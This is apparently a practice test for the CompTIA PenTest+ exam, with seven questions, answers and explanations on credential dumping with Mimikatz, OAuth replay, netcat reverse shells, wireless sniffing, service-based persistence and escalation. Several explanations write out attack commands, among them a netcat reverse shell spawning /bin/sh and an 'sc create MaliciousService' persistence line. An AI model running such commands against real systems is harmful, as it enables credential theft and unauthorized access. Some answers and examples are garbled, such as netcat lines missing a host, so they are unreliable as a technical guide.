CompTIA PT0-003 Exam Practice Test Instant Access

Question 1

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

mimikatz # privilege::debug

mimikatz # lsadump::cache

---Output---

lapsUser

27dh9128361tsg2459210138754ij

---OutputEnd---

Which of the following best describes what the tester plans to do by executing the command?

AThe tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.

BThe tester plans to collect application passwords or hashes to compromise confidential information within the local computer.

CThe tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

DThe tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

Answer : C

The tester is using Mimikatz to dump cached credentials from Local Security Authority (LSA) memory.

Pass-the-Hash (Option C):

The tester extracts cached credentials to authenticate without cracking passwords.

Pass-the-Hash (PtH) allows lateral movement by reusing the NTLM hash on other systems.

Incorrect options:

Option A (Golden Ticket attack): Requires KRBTGT ticket creation, not cached credentials.

Option B (Collect application passwords): Cached hashes are not application-specific.

Option D (Kerberoasting): Kerberoasting targets Service Principal Names (SPNs), not cached credentials.

Question 2

A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?

AA password-spraying attack against the authentication system

BA brute-force attack against the authentication system

CA replay attack against the authentication flow in the system

DA mask attack against the authentication system

Answer : C

OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.

Replay attack (Option C):

Attackers capture legitimate authentication tokens and reuse them to impersonate users.

OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.

Incorrect options:

Option A (Password spraying): Effective against user accounts, but this attack targets authentication tokens.

Option B (Brute-force attack): Less effective against OAuth-based authentication since tokens replace passwords.

Question 3

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?

Anc -e /bin/sh -lp 53

B/bin/sh -c 'nc -l -p 443'

Cnc -e /bin/sh 53

D/bin/sh -c 'nc 443'

Answer : D

The tester needs to pivot from the compromised web server while bypassing firewall restrictions that allow:

Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS)

Unrestricted outbound traffic

Reverse shell using TCP 443 (Option D):

This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall.

Example:

bash

CopyEdit

/bin/sh -c 'nc 443 -e /bin/sh'

The pentester listens on TCP 443 and receives the shell from the target.

Incorrect options:

Option A (nc -e /bin/sh -lp 53): This listens on TCP 53, but does not establish an outbound connection.

Option B (nc -l -p 443): Listens locally but does not connect back to the attacker.

Question 4

Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?

ASecure distribution

BPeer review

CUse AI

DGoal reprioritization

Answer : B

A peer review process ensures that a penetration test report is accurate, unbiased, and free from errors.

Peer review (Option B):

Senior security professionals verify findings, risk levels, and remediation recommendations.

Reduces the risk of misinterpretation or incorrect data in reports.

Incorrect options:

Option A (Secure distribution): Ensures confidentiality, but does not reduce report errors.

Option C (Use AI): AI can assist in analysis, but human verification is essential.

Option D (Goal reprioritization): Changes testing objectives, not report accuracy.

Question 5

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

ABluejacking

BSSID spoofing

CPacket sniffing

DARP poisoning

Answer : C

If a wireless network uses weak encryption (e.g., WEP), attackers can capture and analyze packets to extract sensitive data.

Packet sniffing (Option C):

Tools like Wireshark, Aircrack-ng, and Kismet capture network packets.

Attackers analyze captured traffic to decrypt WEP encryption or extract plaintext credentials.

Incorrect options:

Option A (Bluejacking): Sends unsolicited Bluetooth messages, not for network sniffing.

Option B (SSID spoofing): Involves creating a fake access point, but does not analyze traffic.

Question 6

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

AConfigure and register a service.

BInstall and run remote desktop software.

CSet up a script to be run when users log in.

DPerform a Kerberoasting attack on the host.

Answer : A

Maintaining persistence allows attackers to retain access after a system reboots or security patches are applied.

Configure and register a service (Option A):

Attackers create malicious system services that restart automatically.

Example (Windows):

lua

CopyEdit

sc create MaliciousService binpath= 'C:\malicious.exe'

Incorrect options:

Option B (Remote desktop software): Easily detected by EDR solutions.

Option C (Login script): Works, but can be disabled easily.

Question 7

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

ARestore the configuration.

BPerform a BIA.

CFollow the escalation process.

DSelect the target.

Answer : C

If a penetration tester unintentionally disrupts a critical system, they must immediately follow the client's escalation process to ensure proper handling.

Follow the escalation process (Option C):

The penetration testing engagement follows a predefined incident response and escalation plan.

The tester documents the issue, informs stakeholders, and works with IT teams to minimize impact.

Incorrect options:

Option A (Restore the configuration): Unauthorized changes could violate the engagement scope.

Option B (Perform a BIA): Business Impact Analysis (BIA) is for risk management, not an immediate response.

CompTIA PT0-003 CompTIA PenTest+ Exam Practice Test